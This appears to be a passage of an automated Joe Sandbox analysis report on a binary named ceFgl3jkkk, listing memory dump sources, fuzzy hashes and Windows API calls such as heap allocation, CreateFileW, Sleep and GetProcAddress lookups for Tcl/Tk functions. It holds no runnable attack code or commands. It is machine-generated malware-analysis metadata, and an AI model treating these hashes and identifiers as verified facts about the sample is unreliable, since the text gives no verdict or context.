                                                                                                                      • Opcode Fuzzy Hash: 6c33a79fcf4f3ecaf10a6158a32c432eea0fa7ead880a7e4e351e019804ece17
                                                                                                                      • Instruction Fuzzy Hash: A3D0123250420C778F002BF6BC098177F5C9B817797240651F62CC51E0FE75CA90F551
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
                                                                                                                      • Instruction ID: d83dc877b67e1c5f115108f63999c206d2d7de3ed9e3405fb0ce5b1450cdb9ff
                                                                                                                      • Opcode Fuzzy Hash: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
                                                                                                                      • Instruction Fuzzy Hash: A8210A32D00218BBEB156B689C46B9F37689F4237BF110361FE282B1D1D7745F0AB661
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F68F25
                                                                                                                      • _free.LIBCMT ref: 00F68F54
                                                                                                                        • Part of subcall function 00F63002: IsProcessorFeaturePresent.KERNEL32(00000017,00F66310,?,?,?,00F5C00A,?,?,?), ref: 00F6301E
                                                                                                                        • Part of subcall function 00F63B43: IsProcessorFeaturePresent.KERNEL32(00000017,00F63B32,?,?,?,00F5C00A,?,?,?,00F63B3F,00000000,00000000,00000000,00000000,00000000,00F60DAF), ref: 00F63B45
                                                                                                                        • Part of subcall function 00F63B43: GetCurrentProcess.KERNEL32(C0000417,?,?), ref: 00F63B68
                                                                                                                        • Part of subcall function 00F63B43: TerminateProcess.KERNEL32(00000000,?,?), ref: 00F63B6F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1729132349-0
                                                                                                                      • Opcode ID: 441ab995d3c5caf028862ac26d7383f3f313465e48e2e461208a5307e5e935de
                                                                                                                      • Instruction ID: a41578ee7816f8ae14b1c5ee55acb9d6c29581c8e0ef8f381aeb53bb3a751986
                                                                                                                      • Opcode Fuzzy Hash: 441ab995d3c5caf028862ac26d7383f3f313465e48e2e461208a5307e5e935de
                                                                                                                      • Instruction Fuzzy Hash: BB21F676A04201ABDF289FA8CC41A7AB7AADF94754B28826CE905C7105FB72DD42E710
                                                                                                                      APIs
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1707611234-0
                                                                                                                      • Opcode ID: 5e2cdabac6e38a3707160d2a36151df2deffaec7139b2f7b059ccfe555783e28
                                                                                                                      • Instruction ID: 5f6e0dac4d4abf261634e50b92306f4d84aac1ac4468647992b2ef7bcfa1738a
                                                                                                                      • Opcode Fuzzy Hash: 5e2cdabac6e38a3707160d2a36151df2deffaec7139b2f7b059ccfe555783e28
                                                                                                                      • Instruction Fuzzy Hash: 40016961A00108AACB10DB9ACD04BBFB3FCAB4C711F604151F955E60C0EA78DE90E731
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction ID: 66cdf32264a3599041b57c3d7030ed707ed2f402daca8f1a3faeac4a5d9ac512
                                                                                                                      • Opcode Fuzzy Hash: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction Fuzzy Hash: 2B410375E00208AFDB14DF58CC81AA97BB2FB89364F2C8168F8499B351D771DE42EB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      • Opcode ID: bcf2554fb0783684e5168670dd69d47ebba68a10aac5036646c0b279e9b13442
                                                                                                                      • Instruction ID: f97fec9e9f030ba093166362ebcd9374224453f0d446ef39276d318ccc1e00ff
                                                                                                                      • Opcode Fuzzy Hash: bcf2554fb0783684e5168670dd69d47ebba68a10aac5036646c0b279e9b13442
                                                                                                                      • Instruction Fuzzy Hash: D0410972E0470157D7208A288C4171BBB92AF9533AFA94724FEB4D33C5EB25EC8D5292
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction ID: d33b6fc810dc9a0516b7e832264c5b719ef5d9e796f19fcaff3039d439cc8d82
                                                                                                                      • Opcode Fuzzy Hash: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction Fuzzy Hash: BD0128377083195F9F11AE6DED50AAB3396EBC53383248120FA14CB158EA30C801BB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 91ea42b288042c1d6eea06cba602b4fbfa602196ec093dd552887068233722f2
                                                                                                                      • Instruction ID: 2d79281d3b0fe42ce6dd1f4e422fa2f12d739a569e18cfeca0a449173623daec
                                                                                                                      • Opcode Fuzzy Hash: 91ea42b288042c1d6eea06cba602b4fbfa602196ec093dd552887068233722f2
                                                                                                                      • Instruction Fuzzy Hash: 340126379086186ADA261A69BC02BBB33A9CF83770F30432AF428871D1CF744941B790
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wsopen_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3347428461-0
                                                                                                                      • Opcode ID: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction ID: b47e434e2d21b111a8465f1b092a3887b98e016366cb9959fc3150357e01a7d9
                                                                                                                      • Opcode Fuzzy Hash: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction Fuzzy Hash: A3115AB1A0010AAFCF05DF58E94199F7BF4EF48304F044069F804EB251DA30DA12DB64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction ID: 100c7452f0deb6b0d23e240a3caaaeb17fbaae67ae8569e991c19c1506b6a2a0
                                                                                                                      • Opcode Fuzzy Hash: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction Fuzzy Hash: C9F0FC32901E145AD7213B6ADC05B5B36E88F81376F140755FE38931D1CB7DE90ABBA1
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F663F6,00000001,00000364,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F67065
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction ID: dfc755ca9c7628ede7eaa05474e3197fa3aad0c210fd61459e14adb2f4c8c4f3
                                                                                                                      • Opcode Fuzzy Hash: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction Fuzzy Hash: F8F0BE32A08329B6EB317B629C15B6B37589B817B8B244121FC08AA1C0CB24D841B6F0
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F60F97,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F65BD4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction ID: fc02fb2bba9634e03361d370ad02d32b42a880e516708c6aca3ca04088f08efa
                                                                                                                      • Opcode Fuzzy Hash: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction Fuzzy Hash: 53E0E531904A3857E62126629C01B5E36589BC2BF0F590021EC08B20C0DF50DC0072E5
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F63EF0
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction ID: 68d517dbbbab155f516ebd410f7eab8e7d3e5845cae8cc1f0d9716a8d14d35cf
                                                                                                                      • Opcode Fuzzy Hash: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction Fuzzy Hash: B4F06D375502059F8724CE6CD900A82BBE4EF993217108529E89DD3220D330F912CB80
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction ID: f10a66afa7e949adf7d90b9b5c31a54a8b797fbcd415b6d70d92198432e69040
                                                                                                                      • Opcode Fuzzy Hash: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction Fuzzy Hash: F6D06C3210010DBBDF028F84DC06EDA3BAAFB4C714F018000FA5856020C772E961EB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F5E378
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction ID: 2de662f20f6b9d75b6e0769f2c72da5dfc320ee6b1c78629d1e5ea01de47a5b6
                                                                                                                      • Opcode Fuzzy Hash: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction Fuzzy Hash: 97C04C71500248BBDB059B45D907E5E7BB9DB80364F204054F41557261DBB5EF44A690
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000064,?), ref: 00F5657F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 5d037b7396cf98bd72f949f132a1c114faf31c8eb87b27607e9f51cac269a884
                                                                                                                      • Instruction ID: 83793a0b79842f7b78785cada9dd7548e86e8ab0253ec17c622fd13013a9f867
                                                                                                                      • Opcode Fuzzy Hash: 5d037b7396cf98bd72f949f132a1c114faf31c8eb87b27607e9f51cac269a884
                                                                                                                      • Instruction Fuzzy Hash: F8310662A0024556EB24EF20CC017FB73A6EFA4765FC84925EE56C7209F772DA48E261
                                                                                                                      APIs
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_CreateInterp), ref: 00F552AB
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ErrorLast
                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                      • API String ID: 4214558900-2208601799
                                                                                                                      • Opcode ID: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
                                                                                                                      • Instruction ID: 7c67fa0a043817b5edd0f48540477e452df1304ebb6fe0ebe541d920b6d020c0
